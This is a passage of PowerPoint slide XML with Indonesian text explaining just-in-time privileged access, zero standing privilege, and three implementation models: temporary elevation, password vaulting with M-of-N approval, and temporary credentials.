            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akun administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Just-in-time (JIT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksplisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ZSP). Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sementara-berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Fitur User Account Control (UAC) pada Windows dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repositori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembenaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Persetujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intervensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> N. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kenaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara-berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghancurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
